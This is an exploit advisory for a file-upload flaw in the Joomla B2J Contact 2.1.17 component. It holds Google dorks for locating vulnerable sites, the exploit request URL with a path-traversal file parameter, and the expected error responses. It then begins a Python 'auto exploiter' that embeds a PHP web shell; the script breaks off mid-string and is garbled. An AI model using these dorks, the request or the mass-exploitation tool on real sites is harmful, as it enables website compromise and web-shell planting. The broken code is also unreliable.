#################################################################################################
# Exploit Title : Joomla Codextrous Com_B2jcontact Components 2.1.17 Shell
Upload
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 04/01/2019
# Vendor Homepage : codextrous.com/joomla-components/b2j-contact.html
+ extensions.joomla.org/extension/b2j-contact/
# Software Download Link :
codextrous.com/joomla-components/b2j-contact.html?utm_source=jed&utm_medium=download&utm_campaign=b2jcontact
# Software Price : 29$
# Version Information : 2.1.17
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# CVE-Details => CVE-2017-9030 - CVE-2017-5215 - CVE-2017-5214
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html
# Exploit4Arab Reference Link :
exploit4arab.org/exploits/2098
#################################################################################################
# Description : B2J Contact is one of the most popular extension
of Codextrous which is used for create Contact forms.
This revolutionary, multi-functional Joomla! contact form component is
super easy-to-install,
that brings you the ultimate in User Experience with its clean design and
user friendly backend.
You can create as many contact forms as you want.
You can create a contact form and to display it you create its menu as
well.
B2J Contact component comes with a module also, by which you can display
contact form where ever you want.
B2J Contact has got the following main options which users may customize:
Basic Option - Default Fields - Dynamic Fields - Events - Security
Each section on its own opens up great custom options/fields for you to
play with
to get your contact form up and running smoothly. Despite its enormous
functionality,
B2J Contact Component is extremely lightweight with an amazing design.
Whether you are making an online survey or simply creating another contact
form,
B2J Contact Component is there to help you!
B2J Contact comes with all the below mentioned key features and more:
Joomla! 3.0 Support - In-buit Form Builder -
Access to extension support system - All features shown on the Demo
#################################################################################################
# Google Dorks :
inurl:''/index.php?option=com_b2jcontact''
inurl:''/components/com_b2jcontact/''
intext:''Another Great Website by One Spot Media.''
intext:''Bootstrap is a front-end framework of Twitter, Inc. Code licensed
under MIT License.
Font Awesome font licensed under SIL OFL 1.1.''
intext:''POWERED BY VISUALPROJECT WEB''
intext:''A(c) 2013-2014 Opentec SRL, tutti i diritti riservati.''
intext:''honlap: rosko.hu''
+There are more dorks. Use your brain to find more.
# Exploit :
/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah
# Error displaying on the page [ Error Language changes according to the
country ] :
{"error":"File is empty."}
{"error":"No files were uploaded."}
{"error":"null."}
{"error":"Keine Dateien hochgeladen."}
# Uploaded File Path : /components/com_b2jcontact/.....
# Allowed File Extensions : .php .php5 .html .txt .jpg .jpeg .gif .png
.xml .pdf and other extensions.
# Use Auto Exploiter Tool for this Vulnerability.
#################################################################################################
# Auto Exploitation Tool Python =>
import requests as r
import argparse as arg
import os, sys
import urllib2,urllib,re
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool
from urlparse import urlparse
import random, string
#Coded By KingSkrupellos
#Cyberizm Digital Security Team
def wibu(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
shell = """
$value){
$_POST[$key] = stripslashes($value);
}
}
echo '